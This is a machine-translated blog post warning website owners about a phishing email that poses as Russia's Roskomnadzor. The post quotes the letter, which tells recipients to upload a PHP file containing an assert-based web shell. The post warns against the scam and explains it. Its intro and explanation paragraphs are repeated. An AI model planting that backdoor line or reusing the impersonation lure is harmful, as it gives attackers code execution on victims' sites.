Unusual divorce under the guise of Roskomnadzor
Post-warning, since the divorce is very unusual and created on the wave of blockages by Roskomnadzor.
I think that many have heard that Roskomnadzor has recently recruited many employees who are looking for prohibited information on the Internet and are blocking pages on the Internet. In parallel with this, Roskomnadzor forms a “register of information dissemination organizers” (the law on bloggers). The inclusion of Habr in this list was announced on September 25, 2014.
')
In any case, Roskomnadzor has earned itself a not very good reputation and is confident that site owners are afraid to get on any list of this organization.
Today, my good friend sent me a letter in which it was written that her site with a relatively small attendance is included in this registry.
The text of the letter below, spelling and punctuation saved.
I am sure that it became clear to many that this is a divorce, however, the fraudsters did everything so that not very advanced users would follow the instructions: the letter came from zapret-info@roskomnadzor.org, so an illiterate user might think that they actually wrote to him organizations. When you go to the address roskomnadzor.org user throws on rkn.gov.ru that creates the illusion of a real site and domain. Domain roskomnadzor.org was registered 6 days ago.
Many actions from the user are not needed: create a directory, a file, write one line in this file.
The divorce is that the user is prompted to create a file with a seemingly harmless php code. However, if you look at the description of the assert function, it will immediately become clear that the attackers simply execute the code, which will be specified in the variable roskomnadzor.
I think that many have heard that Roskomnadzor has recently recruited many employees who are looking for prohibited information on the Internet and are blocking pages on the Internet. In parallel with this, Roskomnadzor forms a “register of information dissemination organizers” (the law on bloggers). The inclusion of Habr in this list was announced on September 25, 2014.
')
In any case, Roskomnadzor has earned itself a not very good reputation and is confident that site owners are afraid to get on any list of this organization.
Today, my good friend sent me a letter in which it was written that her site with a relatively small attendance is included in this registry.
The text of the letter below, spelling and punctuation saved.
Hello.
You have received this notice from the Federal Service for Supervision in the Sphere of Telecommunications, Information Technologies and Mass Communications (Roskomnadzor) as you are the administrator of the domain name www.yandex.ru on the Internet.
In accordance with the Federal Law of May 5, 2014 No. 97-FZ “On Amendments to the Federal Law“ On Information, Information Technologies and Protection of Information ”and on the basis of a court decision (Novokuibyshevsky City Court of the Samara Region) dated August 11, 2015 No. 21618 / 2015, your websitewww.yandex.ru was entered into the register of information dissemination organizers on the Internet and sites and (or) pages of sites on the Internet, on which publicly available information is placed and access to which is more than three during the day Thousands of Network Users The Internet".
To identify you as the administrator of the domain name www.yandex.ru , you need:
1. Create a reestr folder in the root directory of your site
2. Create a reestr-id198617.php file in this folder containing the following text:
<? php
/ * Confirmation of the domain name www.yandex.ru * /
assert (stripslashes ($ _ REQUEST [roskomnadzor]));
?>
* In <? Php, you must remove the space between <and? Php
The path to the file on your site should be the following: www.yandex.ru/reestr/reestr-id128032.php
If within 72 hours of receiving this letter you do not identify yourself as the administrator of the domain name www.yandex.ru , follow the instructions listed above, your website www.yandex.ru will be blacklisted by Internet providers and blocked on the territory Russian Federation.
- Respectfully,
FEDERAL SERVICE FOR SUPERVISION IN THE SPHERE OF COMMUNICATION, INFORMATION TECHNOLOGIES AND MASS COMMUNICATION.
I am sure that it became clear to many that this is a divorce, however, the fraudsters did everything so that not very advanced users would follow the instructions: the letter came from zapret-info@roskomnadzor.org, so an illiterate user might think that they actually wrote to him organizations. When you go to the address roskomnadzor.org user throws on rkn.gov.ru that creates the illusion of a real site and domain. Domain roskomnadzor.org was registered 6 days ago.
Many actions from the user are not needed: create a directory, a file, write one line in this file.
The divorce is that the user is prompted to create a file with a seemingly harmless php code. However, if you look at the description of the assert function, it will immediately become clear that the attackers simply execute the code, which will be specified in the variable roskomnadzor.
Source: https://habr.com/ru/post/265515/
All Articles